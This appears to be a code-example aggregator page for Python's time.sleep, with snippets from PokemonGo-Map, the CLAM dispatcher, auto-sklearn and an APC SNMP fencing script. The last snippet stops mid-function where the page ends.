time.sleep

Here are the examples of the python api time.sleep taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.

200 Examples 7

Example 1

Project: PokemonGo-Map
Source File: search.py
View license
def search_worker_thread(args, account_queue, account_failures, search_items_queue, pause_bit, encryption_lib_path, status, dbq, whq):

    log.debug('Search worker thread starting')

    # The outer forever loop restarts only when the inner one is intentionally exited - which should only be done when the worker is failing too often, and probably banned.
    # This reinitializes the API and grabs a new account from the queue.
    while True:
        try:
            status['starttime'] = now()

            # Get account
            status['message'] = 'Waiting to get new account from the queue'
            log.info(status['message'])
            account = account_queue.get()
            status['message'] = 'Switching to account {}'.format(account['username'])
            status['user'] = account['username']
            log.info(status['message'])

            stagger_thread(args, account)

            # New lease of life right here
            status['fail'] = 0
            status['success'] = 0
            status['noitems'] = 0
            status['skip'] = 0
            status['location'] = False
            status['last_scan_time'] = 0

            # only sleep when consecutive_fails reaches max_failures, overall fails for stat purposes
            consecutive_fails = 0

            # Create the API instance this will use
            if args.mock != '':
                api = FakePogoApi(args.mock)
            else:
                api = PGoApi()

            if status['proxy_url']:
                log.debug("Using proxy %s", status['proxy_url'])
                api.set_proxy({'http': status['proxy_url'], 'https': status['proxy_url']})

            api.activate_signature(encryption_lib_path)

            # The forever loop for the searches
            while True:

                # If this account has been messing up too hard, let it rest
                if consecutive_fails >= args.max_failures:
                    status['message'] = 'Account {} failed more than {} scans; possibly bad account. Switching accounts...'.format(account['username'], args.max_failures)
                    log.warning(status['message'])
                    account_failures.append({'account': account, 'last_fail_time': now(), 'reason': 'failures'})
                    break  # exit this loop to get a new account and have the API recreated

                while pause_bit.is_set():
                    status['message'] = 'Scanning paused'
                    time.sleep(2)

                # If this account has been running too long, let it rest
                if (args.account_search_interval is not None):
                    if (status['starttime'] <= (now() - args.account_search_interval)):
                        status['message'] = 'Account {} is being rotated out to rest.'.format(account['username'])
                        log.info(status['message'])
                        account_failures.append({'account': account, 'last_fail_time': now(), 'reason': 'rest interval'})
                        break

                # Grab the next thing to search (when available)
                status['message'] = 'Waiting for item from queue'
                step, step_location, appears, leaves = search_items_queue.get()

                # too soon?
                if appears and now() < appears + 10:  # adding a 10 second grace period
                    first_loop = True
                    paused = False
                    while now() < appears + 10:
                        if pause_bit.is_set():
                            paused = True
                            break  # why can't python just have `break 2`...
                        remain = appears - now() + 10
                        status['message'] = 'Early for {:6f},{:6f}; waiting {}s...'.format(step_location[0], step_location[1], remain)
                        if first_loop:
                            log.info(status['message'])
                            first_loop = False
                        time.sleep(1)
                    if paused:
                        search_items_queue.task_done()
                        continue

                # too late?
                if leaves and now() > (leaves - args.min_seconds_left):
                    search_items_queue.task_done()
                    status['skip'] += 1
                    # it is slightly silly to put this in status['message'] since it'll be overwritten very shortly after. Oh well.
                    status['message'] = 'Too late for location {:6f},{:6f}; skipping'.format(step_location[0], step_location[1])
                    log.info(status['message'])
                    # No sleep here; we've not done anything worth sleeping for. Plus we clearly need to catch up!
                    continue

                # Let the api know where we intend to be for this loop
                # doing this before check_login so it does not also have to be done there
                # when the auth token is refreshed
                api.set_position(*step_location)

                # Ok, let's get started -- check our login status
                check_login(args, account, api, step_location, status['proxy_url'])

                # putting this message after the check_login so the messages aren't out of order
                status['message'] = 'Searching at {:6f},{:6f}'.format(step_location[0], step_location[1])
                log.info(status['message'])

                # Make the actual request (finally!)
                response_dict = map_request(api, step_location, args.jitter)

                # G'damnit, nothing back. Mark it up, sleep, carry on
                if not response_dict:
                    status['fail'] += 1
                    consecutive_fails += 1
                    status['message'] = 'Invalid response at {:6f},{:6f}, abandoning location'.format(step_location[0], step_location[1])
                    log.error(status['message'])
                    time.sleep(args.scan_delay)
                    continue

                # Got the response, parse it out, send todo's to db/wh queues
                try:
                    parsed = parse_map(args, response_dict, step_location, dbq, whq, api)
                    search_items_queue.task_done()
                    status[('success' if parsed['count'] > 0 else 'noitems')] += 1
                    consecutive_fails = 0
                    status['message'] = 'Search at {:6f},{:6f} completed with {} finds'.format(step_location[0], step_location[1], parsed['count'])
                    log.debug(status['message'])
                except KeyError:
                    parsed = False
                    status['fail'] += 1
                    consecutive_fails += 1
                    status['message'] = 'Map parse failed at {:6f},{:6f}, abandoning location. {} may be banned.'.format(step_location[0], step_location[1], account['username'])
                    log.exception(status['message'])

                # Get detailed information about gyms
                if args.gym_info and parsed:
                    # build up a list of gyms to update
                    gyms_to_update = {}
                    for gym in parsed['gyms'].values():
                        # Can only get gym details within 1km of our position
                        distance = calc_distance(step_location, [gym['latitude'], gym['longitude']])
                        if distance < 1:
                            # check if we already have details on this gym (if not, get them)
                            try:
                                record = GymDetails.get(gym_id=gym['gym_id'])
                            except GymDetails.DoesNotExist as e:
                                gyms_to_update[gym['gym_id']] = gym
                                continue

                            # if we have a record of this gym already, check if the gym has been updated since our last update
                            if record.last_scanned < gym['last_modified']:
                                gyms_to_update[gym['gym_id']] = gym
                                continue
                            else:
                                log.debug('Skipping update of gym @ %f/%f, up to date', gym['latitude'], gym['longitude'])
                                continue
                        else:
                            log.debug('Skipping update of gym @ %f/%f, too far away from our location at %f/%f (%fkm)', gym['latitude'], gym['longitude'], step_location[0], step_location[1], distance)

                    if len(gyms_to_update):
                        gym_responses = {}
                        current_gym = 1
                        status['message'] = 'Updating {} gyms for location {},{}...'.format(len(gyms_to_update), step_location[0], step_location[1])
                        log.debug(status['message'])

                        for gym in gyms_to_update.values():
                            status['message'] = 'Getting details for gym {} of {} for location {},{}...'.format(current_gym, len(gyms_to_update), step_location[0], step_location[1])
                            time.sleep(random.random() + 2)
                            response = gym_request(api, step_location, gym)

                            # make sure the gym was in range. (sometimes the API gets cranky about gyms that are ALMOST 1km away)
                            if response['responses']['GET_GYM_DETAILS']['result'] == 2:
                                log.warning('Gym @ %f/%f is out of range (%dkm), skipping', gym['latitude'], gym['longitude'], distance)
                            else:
                                gym_responses[gym['gym_id']] = response['responses']['GET_GYM_DETAILS']

                            # increment which gym we're on (for status messages)
                            current_gym += 1

                        status['message'] = 'Processing details of {} gyms for location {},{}...'.format(len(gyms_to_update), step_location[0], step_location[1])
                        log.debug(status['message'])

                        if gym_responses:
                            parse_gyms(args, gym_responses, whq)

                # Record the time and place the worker left off at
                status['last_scan_time'] = now()
                status['location'] = step_location

                # Always delay the desired amount after "scan" completion
                status['message'] += ', sleeping {}s until {}'.format(args.scan_delay, time.strftime('%H:%M:%S', time.localtime(time.time() + args.scan_delay)))
                time.sleep(args.scan_delay)

        # catch any process exceptions, log them, and continue the thread
        except Exception as e:
            status['message'] = 'Exception in search_worker using account {}. Restarting with fresh account. See logs for details.'.format(account['username'])
            time.sleep(args.scan_delay)
            log.error('Exception in search_worker under account {} Exception message: {}'.format(account['username'], e))
            account_failures.append({'account': account, 'last_fail_time': now(), 'reason': 'exception'})

Example 2

Project: clam
Source File: clamdispatcher.py
View license
def main():
    if len(sys.argv) < 4:
        print("[CLAM Dispatcher] ERROR: Invalid syntax, use clamdispatcher.py [pythonpath] settingsmodule projectdir cmd arg1 arg2 ... got: " + " ".join(sys.argv[1:]), file=sys.stderr)
        with open('.done','w') as f:
            f.write(str(1))
        if os.path.exists('.pid'): os.unlink('.pid')
        return 1

    offset = 0
    if '/' in sys.argv[1]:
        #os.environ['PYTHONPATH'] = sys.argv[1]
        for path in sys.argv[1].split(':'):
            print("[CLAM Dispatcher] Adding to PYTHONPATH: " + path, file=sys.stderr)
            sys.path.append(path)
        offset = 1

    settingsmodule = sys.argv[1+offset]
    projectdir = sys.argv[2+offset]
    if projectdir == 'NONE': #Actions
        tmpdir = None
        projectdir = None
    elif projectdir.startswith('tmp://'): #Used for actions with a temporary dir
        tmpdir = projectdir[6:]
        projectdir = None
    else:
        if projectdir[-1] != '/':
            projectdir += '/'
        tmpdir = os.path.join(projectdir,'tmp')

    print("[CLAM Dispatcher] Started CLAM Dispatcher v" + str(VERSION) + " with " + settingsmodule + " (" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + ")", file=sys.stderr)

    cmd = sys.argv[3+offset]
    cmd = clam.common.data.unescapeshelloperators(cmd) #shell operators like pipes and redirects were passed in an escaped form
    if sys.version[0] == '2' and isinstance(cmd,str):
        cmd = unicode(cmd,'utf-8') #pylint: disable=undefined-variable
    for arg in sys.argv[4+offset:]:
        arg_u = clam.common.data.unescapeshelloperators(arg)
        if arg_u != arg:
            cmd += " " + arg_u #shell operator (pipe or something)
        else:
            cmd += " " + clam.common.data.shellsafe(arg,'"')


    if not cmd:
        print("[CLAM Dispatcher] FATAL ERROR: No command specified!", file=sys.stderr)
        if projectdir:
            f = open(projectdir + '.done','w')
            f.write(str(1))
            f.close()
            if os.path.exists(projectdir + '.pid'): os.unlink(projectdir + '.pid')
        return 1
    elif projectdir and not os.path.isdir(projectdir):
        print("[CLAM Dispatcher] FATAL ERROR: Project directory "+ projectdir + " does not exist", file=sys.stderr)
        f = open(projectdir + '.done','w')
        f.write(str(1))
        f.close()
        if os.path.exists(projectdir + '.pid'): os.unlink(projectdir + '.pid')
        return 1

    try:
        #exec("import " + settingsmodule + " as settings")
        settings = __import__(settingsmodule , globals(), locals(),0)
        try:
            if settings.CUSTOM_FORMATS:
                clam.common.data.CUSTOM_FORMATS = settings.CUSTOM_FORMATS
                print("[CLAM Dispatcher] Dependency injection for custom formats succeeded", file=sys.stderr)
        except AttributeError:
            pass
    except ImportError as e:
        print("[CLAM Dispatcher] FATAL ERROR: Unable to import settings module, settingsmodule is " + settingsmodule + ", error: " + str(e), file=sys.stderr)
        print("[CLAM Dispatcher]      hint: If you're using the development server, check you pass the path your service configuration file is in using the -P flag. For Apache integration, verify you add this path to your PYTHONPATH (can be done from the WSGI script)", file=sys.stderr)
        if projectdir:
            f = open(projectdir + '.done','w')
            f.write(str(1))
            f.close()
        return 1

    settingkeys = dir(settings)
    if not 'DISPATCHER_POLLINTERVAL' in settingkeys:
        settings.DISPATCHER_POLLINTERVAL = 30
    if not 'DISPATCHER_MAXRESMEM' in settingkeys:
        settings.DISPATCHER_MAXRESMEM = 0
    if not 'DISPATCHER_MAXTIME' in settingkeys:
        settings.DISPATCHER_MAXTIME = 0


    try:
        print("[CLAM Dispatcher] Running " + cmd, file=sys.stderr)
    except (UnicodeDecodeError, UnicodeError, UnicodeEncodeError):
        print("[CLAM Dispatcher] Running " + repr(cmd), file=sys.stderr) #unicode-issues on Python 2

    if sys.version[0] == '2' and isinstance(cmd,unicode): #pylint: disable=undefined-variable
        cmd = cmd.encode('utf-8')
    if projectdir:
        process = subprocess.Popen(cmd,cwd=projectdir, shell=True, stderr=sys.stderr)
    else:
        process = subprocess.Popen(cmd, shell=True, stderr=sys.stderr)
    begintime = datetime.datetime.now()
    if process:
        pid = process.pid
        print("[CLAM Dispatcher] Running with pid " + str(pid) + " (" + begintime.strftime('%Y-%m-%d %H:%M:%S') + ")", file=sys.stderr)
        sys.stderr.flush()
        if projectdir:
            with open(projectdir + '.pid','w') as f:
                f.write(str(pid))
    else:
        print("[CLAM Dispatcher] Unable to launch process", file=sys.stderr)
        sys.stderr.flush()
        if projectdir:
            with open(projectdir + '.done','w') as f:
                f.write(str(1))
        return 1

    #intervalf = lambda s: min(s/10.0, 15)
    abort = False
    idle = 0
    done = False
    lastpolltime = datetime.datetime.now()
    lastabortchecktime = datetime.datetime.now()

    while not done:
        d = total_seconds(datetime.datetime.now() - begintime)
        try:
            returnedpid, statuscode = os.waitpid(pid, os.WNOHANG)
            if returnedpid != 0:
                print("[CLAM Dispatcher] Process ended (" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + ", " + str(d)+"s) ", file=sys.stderr)
                done = True
        except OSError: #no such process
            print("[CLAM Dispatcher] Process lost! (" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + ", " + str(d)+"s)", file=sys.stderr)
            statuscode = 1
            done = True

        if done:
            break

        if total_seconds(datetime.datetime.now() - lastabortchecktime) >= min(10, d* 0.5):  #every 10 seconds, faster at beginning
            if projectdir and os.path.exists(projectdir + '.abort'):
                abort = True
            if abort:
                print("[CLAM Dispatcher] ABORTING PROCESS ON SIGNAL! (" + str(d)+"s)", file=sys.stderr)
                os.system("sleep 30 && kill -9 " + str(pid) + " &") #deathtrap in case the process doesn't listen within 30 seconds
                os.kill(pid, signal.SIGTERM)
                os.waitpid(pid, 0)
                if projectdir:
                    os.unlink(projectdir + '.abort')
                    open(projectdir + '.aborted','w')
                    f.close()
                done = True
                break
            lastabortchecktime = datetime.datetime.now()


        if d <= 1:
            idle += 0.05
            time.sleep(0.05)
        elif d <= 2:
            idle += 0.2
            time.sleep(0.2)
        elif d <= 10:
            idle += 0.5
            time.sleep(0.5)
        else:
            idle += 1
            time.sleep(1)

        if settings.DISPATCHER_MAXRESMEM > 0 and total_seconds(datetime.datetime.now() - lastpolltime) >= settings.DISPATCHER_POLLINTERVAL:
            resmem = mem(pid)
            if resmem > settings.DISPATCHER_MAXRESMEM * 1024:
                print("[CLAM Dispatcher] PROCESS EXCEEDS MAXIMUM RESIDENT MEMORY USAGE (" + str(resmem) + ' >= ' + str(settings.DISPATCHER_MAXRESMEM) + ')... ABORTING', file=sys.stderr)
                abort = True
                statuscode = 2
            lastpolltime = datetime.datetime.now()
        elif settings.DISPATCHER_MAXTIME > 0 and d > settings.DISPATCHER_MAXTIME:
            print("[CLAM Dispatcher] PROCESS TIMED OUT.. NO COMPLETION WITHIN " + str(d) + " SECONDS ... ABORTING", file=sys.stderr)
            abort = True
            statuscode = 3

    if projectdir:
        with open(projectdir + '.done','w') as f:
            f.write(str(statuscode))
        if os.path.exists(projectdir + '.pid'): os.unlink(projectdir + '.pid')

        #remove project index cache (has to be recomputed next time because this project now has a different size)
        if os.path.exists(os.path.join(projectdir,'..','.index')):
            os.unlink(os.path.join(projectdir,'..','.index'))


    if tmpdir and os.path.exists(tmpdir):
        print("[CLAM Dispatcher] Removing temporary files", file=sys.stderr)
        for filename in os.listdir(tmpdir):
            filepath = os.path.join(tmpdir,filename)
            try:
                if os.path.isdir(filepath):
                    shutil.rmtree(filepath)
                else:
                    os.unlink(filepath)
            except: #pylint: disable=bare-except
                print("[CLAM Dispatcher] Unable to remove " + filename, file=sys.stderr)

    d = total_seconds(datetime.datetime.now() - begintime)
    if statuscode > 127:
        print("[CLAM Dispatcher] Status code out of range (" + str(statuscode) + "), setting to 127", file=sys.stderr)
        statuscode = 127
    print("[CLAM Dispatcher] Finished (" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + "), exit code " + str(statuscode) + ", dispatcher wait time " + str(idle)  + "s, duration " + str(d) + "s", file=sys.stderr)

    return statuscode

Example 3

Project: auto-sklearn
Source File: ensemble_builder.py
View license
    def main(self):

        watch = StopWatch()
        watch.start_task('ensemble_builder')

        used_time = 0
        time_iter = 0
        index_run = 0
        num_iteration = 0
        current_num_models = 0
        last_hash = None
        current_hash = None

        dir_ensemble = os.path.join(self.backend.temporary_directory,
                                    '.auto-sklearn',
                                    'predictions_ensemble')
        dir_valid = os.path.join(self.backend.temporary_directory,
                                 '.auto-sklearn',
                                 'predictions_valid')
        dir_test = os.path.join(self.backend.temporary_directory,
                                '.auto-sklearn',
                                'predictions_test')
        paths_ = [dir_ensemble, dir_valid, dir_test]

        dir_ensemble_list_mtimes = []

        self.logger.debug('Starting main loop with %f seconds and %d iterations '
                          'left.' % (self.limit - used_time, num_iteration))
        while used_time < self.limit or (self.max_iterations > 0 and
                                         self.max_iterations >= num_iteration):
            num_iteration += 1
            self.logger.debug('Time left: %f', self.limit - used_time)
            self.logger.debug('Time last ensemble building: %f', time_iter)

            # Reload the ensemble targets every iteration, important, because cv may
            # update the ensemble targets in the cause of running auto-sklearn
            # TODO update cv in order to not need this any more!
            targets_ensemble = self.backend.load_targets_ensemble()

            # Load the predictions from the models
            exists = [os.path.isdir(dir_) for dir_ in paths_]
            if not exists[0]:  # all(exists):
                self.logger.debug('Prediction directory %s does not exist!' %
                              dir_ensemble)
                time.sleep(2)
                used_time = watch.wall_elapsed('ensemble_builder')
                continue

            if self.shared_mode is False:
                dir_ensemble_list = sorted(glob.glob(os.path.join(
                    dir_ensemble, 'predictions_ensemble_%s_*.npy' % self.seed)))
                if exists[1]:
                    dir_valid_list = sorted(glob.glob(os.path.join(
                        dir_valid, 'predictions_valid_%s_*.npy' % self.seed)))
                else:
                    dir_valid_list = []
                if exists[2]:
                    dir_test_list = sorted(glob.glob(os.path.join(
                        dir_test, 'predictions_test_%s_*.npy' % self.seed)))
                else:
                    dir_test_list = []
            else:
                dir_ensemble_list = sorted(os.listdir(dir_ensemble))
                dir_valid_list = sorted(os.listdir(dir_valid)) if exists[1] else []
                dir_test_list = sorted(os.listdir(dir_test)) if exists[2] else []

            # Check the modification times because predictions can be updated
            # over time!
            old_dir_ensemble_list_mtimes = dir_ensemble_list_mtimes
            dir_ensemble_list_mtimes = []
            # The ensemble dir can contain non-model files. We filter them and
            # use the following list instead
            dir_ensemble_model_files = []

            for dir_ensemble_file in dir_ensemble_list:
                if dir_ensemble_file.endswith("/"):
                    dir_ensemble_file = dir_ensemble_file[:-1]
                if not dir_ensemble_file.endswith(".npy"):
                    self.logger.warning('Error loading file (not .npy): %s', dir_ensemble_file)
                    continue

                dir_ensemble_model_files.append(dir_ensemble_file)
                basename = os.path.basename(dir_ensemble_file)
                dir_ensemble_file = os.path.join(dir_ensemble, basename)
                mtime = os.path.getmtime(dir_ensemble_file)
                dir_ensemble_list_mtimes.append(mtime)

            if len(dir_ensemble_model_files) == 0:
                self.logger.debug('Directories are empty')
                time.sleep(2)
                used_time = watch.wall_elapsed('ensemble_builder')
                continue

            if len(dir_ensemble_model_files) <= current_num_models and \
                    old_dir_ensemble_list_mtimes == dir_ensemble_list_mtimes:
                self.logger.debug('Nothing has changed since the last time')
                time.sleep(2)
                used_time = watch.wall_elapsed('ensemble_builder')
                continue

            with warnings.catch_warnings():
                warnings.simplefilter('ignore')
                # TODO restructure time management in the ensemble builder,
                # what is the time of index_run actually needed for?
                watch.start_task('index_run' + str(index_run))
            watch.start_task('ensemble_iter_' + str(num_iteration))

            # List of num_runs (which are in the filename) which will be included
            #  later
            include_num_runs = []
            backup_num_runs = []
            model_and_automl_re = re.compile(r'_([0-9]*)_([0-9]*)\.npy$')
            if self.ensemble_nbest is not None:
                # Keeps track of the single scores of each model in our ensemble
                scores_nbest = []
                # The indices of the model that are currently in our ensemble
                indices_nbest = []
                # The names of the models
                model_names = []

            model_names_to_scores = dict()

            model_idx = 0
            for model_name in dir_ensemble_model_files:
                if model_name.endswith("/"):
                    model_name = model_name[:-1]
                basename = os.path.basename(model_name)

                try:
                    if self.precision is "16":
                        predictions = np.load(os.path.join(dir_ensemble, basename)).astype(dtype=np.float16)
                    elif self.precision is "32":
                        predictions = np.load(os.path.join(dir_ensemble, basename)).astype(dtype=np.float32)
                    elif self.precision is "64":
                        predictions = np.load(os.path.join(dir_ensemble, basename)).astype(dtype=np.float64)
                    else:
                        predictions = np.load(os.path.join(dir_ensemble, basename))

                    score = calculate_score(targets_ensemble, predictions,
                                            self.task_type, self.metric,
                                            predictions.shape[1])

                except Exception as e:
                    self.logger.warning('Error loading %s: %s - %s',
                                        basename, type(e), e)
                    score = -1

                model_names_to_scores[model_name] = score
                match = model_and_automl_re.search(model_name)
                automl_seed = int(match.group(1))
                num_run = int(match.group(2))

                if self.ensemble_nbest is not None:
                    if score <= 0.001:
                        self.logger.info('Model only predicts at random: ' +
                                         model_name + ' has score: ' + str(score))
                        backup_num_runs.append((automl_seed, num_run))
                    # If we have less models in our ensemble than ensemble_nbest add
                    # the current model if it is better than random
                    elif len(scores_nbest) < self.ensemble_nbest:
                        scores_nbest.append(score)
                        indices_nbest.append(model_idx)
                        include_num_runs.append((automl_seed, num_run))
                        model_names.append(model_name)
                    else:
                        # Take the worst performing model in our ensemble so far
                        idx = np.argmin(np.array([scores_nbest]))

                        # If the current model is better than the worst model in
                        # our ensemble replace it by the current model
                        if scores_nbest[idx] < score:
                            self.logger.info(
                                'Worst model in our ensemble: %s with score %f '
                                'will be replaced by model %s with score %f',
                                model_names[idx], scores_nbest[idx], model_name,
                                score)
                            # Exclude the old model
                            del scores_nbest[idx]
                            scores_nbest.append(score)
                            del include_num_runs[idx]
                            del indices_nbest[idx]
                            indices_nbest.append(model_idx)
                            include_num_runs.append((automl_seed, num_run))
                            del model_names[idx]
                            model_names.append(model_name)

                        # Otherwise exclude the current model from the ensemble
                        else:
                            # include_num_runs.append(True)
                            pass

                else:
                    # Load all predictions that are better than random
                    if score <= 0.001:
                        # include_num_runs.append(True)
                        self.logger.info('Model only predicts at random: ' +
                                         model_name + ' has score: ' +
                                         str(score))
                        backup_num_runs.append((automl_seed, num_run))
                    else:
                        include_num_runs.append((automl_seed, num_run))

                model_idx += 1

            # If there is no model better than random guessing, we have to use
            # all models which do random guessing
            if len(include_num_runs) == 0:
                include_num_runs = backup_num_runs

            indices_to_model_names = dict()
            indices_to_run_num = dict()
            for i, model_name in enumerate(dir_ensemble_model_files):
                match = model_and_automl_re.search(model_name)
                automl_seed = int(match.group(1))
                num_run = int(match.group(2))
                if (automl_seed, num_run) in include_num_runs:
                    num_indices = len(indices_to_model_names)
                    indices_to_model_names[num_indices] = model_name
                    indices_to_run_num[num_indices] = (automl_seed, num_run)

            try:
                all_predictions_train, all_predictions_valid, all_predictions_test =\
                    self.get_all_predictions(dir_ensemble,
                                             dir_ensemble_model_files,
                                             dir_valid, dir_valid_list,
                                             dir_test, dir_test_list,
                                             include_num_runs,
                                             model_and_automl_re,
                                             self.precision)
            except IOError:
                self.logger.error('Could not load the predictions.')
                continue

            if len(include_num_runs) == 0:
                self.logger.error('All models do just random guessing')
                time.sleep(2)
                continue

            else:
                ensemble = EnsembleSelection(ensemble_size=self.ensemble_size,
                                             task_type=self.task_type,
                                             metric=self.metric)

                try:
                    ensemble.fit(all_predictions_train, targets_ensemble,
                                 include_num_runs)
                    self.logger.info(ensemble)

                except ValueError as e:
                    self.logger.error('Caught ValueError: ' + str(e))
                    used_time = watch.wall_elapsed('ensemble_builder')
                    time.sleep(2)
                    continue
                except IndexError as e:
                    self.logger.error('Caught IndexError: ' + str(e))
                    used_time = watch.wall_elapsed('ensemble_builder')
                    time.sleep(2)
                    continue
                except Exception as e:
                    self.logger.error('Caught error! %s', str(e))
                    used_time = watch.wall_elapsed('ensemble_builder')
                    time.sleep(2)
                    continue

                # Output the score
                self.logger.info('Training performance: %f' % ensemble.train_score_)

                self.logger.info('Building the ensemble took %f seconds' %
                            watch.wall_elapsed('ensemble_iter_' + str(num_iteration)))

            # Set this variable here to avoid re-running the ensemble builder
            # every two seconds in case the ensemble did not change
            current_num_models = len(dir_ensemble_model_files)

            ensemble_predictions = ensemble.predict(all_predictions_train)
            if sys.version_info[0] == 2:
                ensemble_predictions.flags.writeable = False
                current_hash = hash(ensemble_predictions.data)
            else:
                current_hash = hash(ensemble_predictions.data.tobytes())

            # Only output a new ensemble and new predictions if the output of the
            # ensemble would actually change!
            # TODO this is neither safe (collisions, tests only with the ensemble
            #  prediction, but not the ensemble), implement a hash function for
            # each possible ensemble builder.
            if last_hash is not None:
                if current_hash == last_hash:
                    self.logger.info('Ensemble output did not change.')
                    time.sleep(2)
                    continue
                else:
                    last_hash = current_hash
            else:
                last_hash = current_hash

            # Save the ensemble for later use in the main auto-sklearn module!
            self.backend.save_ensemble(ensemble, index_run, self.seed)

            # Save predictions for valid and test data set
            if len(dir_valid_list) == len(dir_ensemble_model_files):
                all_predictions_valid = np.array(all_predictions_valid)
                ensemble_predictions_valid = ensemble.predict(all_predictions_valid)
                if self.task_type == BINARY_CLASSIFICATION:
                    ensemble_predictions_valid = ensemble_predictions_valid[:, 1]
                if self.low_precision:
                    if self.task_type in [BINARY_CLASSIFICATION, MULTICLASS_CLASSIFICATION, MULTILABEL_CLASSIFICATION]:
                        ensemble_predictions_valid[ensemble_predictions_valid < 1e-4] = 0.
                    if self.metric in [BAC_METRIC, F1_METRIC]:
                        bin_array = np.zeros(ensemble_predictions_valid.shape, dtype=np.int32)
                        if (self.task_type != MULTICLASS_CLASSIFICATION) or (
                            ensemble_predictions_valid.shape[1] == 1):
                            bin_array[ensemble_predictions_valid >= 0.5] = 1
                        else:
                            sample_num = ensemble_predictions_valid.shape[0]
                            for i in range(sample_num):
                                j = np.argmax(ensemble_predictions_valid[i, :])
                                bin_array[i, j] = 1
                        ensemble_predictions_valid = bin_array
                    if self.task_type in CLASSIFICATION_TASKS:
                        if ensemble_predictions_valid.size < (20000 * 20):
                            precision = 3
                        else:
                            precision = 2
                    else:
                        if ensemble_predictions_valid.size > 1000000:
                            precision = 4
                        else:
                            # File size maximally 2.1MB
                            precision = 6

                self.backend.save_predictions_as_txt(ensemble_predictions_valid,
                                                'valid', index_run, prefix=self.dataset_name,
                                                precision=precision)
            else:
                self.logger.info('Could not find as many validation set predictions (%d)'
                             'as ensemble predictions (%d)!.',
                            len(dir_valid_list), len(dir_ensemble_model_files))

            del all_predictions_valid

            if len(dir_test_list) == len(dir_ensemble_model_files):
                all_predictions_test = np.array(all_predictions_test)
                ensemble_predictions_test = ensemble.predict(all_predictions_test)
                if self.task_type == BINARY_CLASSIFICATION:
                    ensemble_predictions_test = ensemble_predictions_test[:, 1]
                if self.low_precision:
                    if self.task_type in [BINARY_CLASSIFICATION, MULTICLASS_CLASSIFICATION, MULTILABEL_CLASSIFICATION]:
                        ensemble_predictions_test[ensemble_predictions_test < 1e-4] = 0.
                    if self.metric in [BAC_METRIC, F1_METRIC]:
                        bin_array = np.zeros(ensemble_predictions_test.shape,
                                             dtype=np.int32)
                        if (self.task_type != MULTICLASS_CLASSIFICATION) or (
                                    ensemble_predictions_test.shape[1] == 1):
                            bin_array[ensemble_predictions_test >= 0.5] = 1
                        else:
                            sample_num = ensemble_predictions_test.shape[0]
                            for i in range(sample_num):
                                j = np.argmax(ensemble_predictions_test[i, :])
                                bin_array[i, j] = 1
                        ensemble_predictions_test = bin_array
                    if self.task_type in CLASSIFICATION_TASKS:
                        if ensemble_predictions_test.size < (20000 * 20):
                            precision = 3
                        else:
                            precision = 2
                    else:
                        if ensemble_predictions_test.size > 1000000:
                            precision = 4
                        else:
                            precision = 6

                self.backend.save_predictions_as_txt(ensemble_predictions_test,
                                                     'test', index_run, prefix=self.dataset_name,
                                                     precision=precision)
            else:
                self.logger.info('Could not find as many test set predictions (%d) as '
                             'ensemble predictions (%d)!',
                            len(dir_test_list), len(dir_ensemble_model_files))

            del all_predictions_test

            current_num_models = len(dir_ensemble_model_files)
            watch.stop_task('index_run' + str(index_run))
            time_iter = watch.get_wall_dur('index_run' + str(index_run))
            used_time = watch.wall_elapsed('ensemble_builder')
            index_run += 1
        return

Example 4

Project: autotest
Source File: fence_apc_snmp.py
View license
def main():
    apc_base = "enterprises.apc.products.hardware."
    apc_outletctl = "masterswitch.sPDUOutletControl.sPDUOutletControlTable.sPDUOutletControlEntry.sPDUOutletCtl."
    apc_outletstatus = "masterswitch.sPDUOutletStatus.sPDUOutletStatusMSPTable.sPDUOutletStatusMSPEntry.sPDUOutletStatusMSP."

    address = ""
    output = ""
    port = ""
    action = "outletReboot"
    status_check = False
    verbose = False

    if not glob('/usr/share/snmp/mibs/powernet*.mib'):
        sys.stderr.write('This APC Fence script uses snmp to control the APC power switch. This script requires that net-snmp-utils be installed on all nodes in the cluster, and that the powernet369.mib file be located in /usr/share/snmp/mibs/\n')
        sys.exit(1)

    if len(sys.argv) > 1:
        try:
            opts, args = getopt.getopt(sys.argv[1:], "a:hl:p:n:o:vV", ["help", "output="])
        except getopt.GetoptError:
            # print help info and quit
            usage()
            sys.exit(2)

        for o, a in opts:
            if o == "-v":
                verbose = True
            if o == "-V":
                print "%s\n" % FENCE_RELEASE_NAME
                print "%s\n" % REDHAT_COPYRIGHT
                print "%s\n" % BUILD_DATE
                sys.exit(0)
            if o in ("-h", "--help"):
                usage()
                sys.exit(0)
            if o == "-n":
                port = a
            if o == "-o":
                lcase = a.lower()  # Lower case string
                if lcase == "off":
                    action = "outletOff"
                elif lcase == "on":
                    action = "outletOn"
                elif lcase == "reboot":
                    action = "outletReboot"
                elif lcase == "status":
                    #action = "sPDUOutletStatusMSPOutletState"
                    action = ""
                    status_check = True
                else:
                    usage()
                    sys.exit()
            if o == "-a":
                address = a

        if address == "":
            usage()
            sys.exit(1)

        if port == "":
            usage()
            sys.exit(1)

    else:  # Get opts from stdin
        params = {}
        # place params in dict
        for line in sys.stdin:
            val = line.split("=")
            if len(val) == 2:
                params[val[0].strip()] = val[1].strip()

        try:
            address = params["ipaddr"]
        except KeyError, e:
            sys.stderr.write("FENCE: Missing ipaddr param for fence_apc...exiting")
            sys.exit(1)
        try:
            login = params["login"]
        except KeyError, e:
            sys.stderr.write("FENCE: Missing login param for fence_apc...exiting")
            sys.exit(1)

        try:
            passwd = params["passwd"]
        except KeyError, e:
            sys.stderr.write("FENCE: Missing passwd param for fence_apc...exiting")
            sys.exit(1)

        try:
            port = params["port"]
        except KeyError, e:
            sys.stderr.write("FENCE: Missing port param for fence_apc...exiting")
            sys.exit(1)

        try:
            a = params["option"]
            if a == "Off" or a == "OFF" or a == "off":
                action = POWER_OFF
            elif a == "On" or a == "ON" or a == "on":
                action = POWER_ON
            elif a == "Reboot" or a == "REBOOT" or a == "reboot":
                action = POWER_REBOOT
        except KeyError, e:
            action = POWER_REBOOT

        # End of stdin section

    apc_command = apc_base + apc_outletctl + port

    args_status = list()
    args_off = list()
    args_on = list()

    args_status.append("/usr/bin/snmpget")
    args_status.append("-Oqu")  # sets printing options
    args_status.append("-v")
    args_status.append("1")
    args_status.append("-c")
    args_status.append("private")
    args_status.append("-m")
    args_status.append("ALL")
    args_status.append(address)
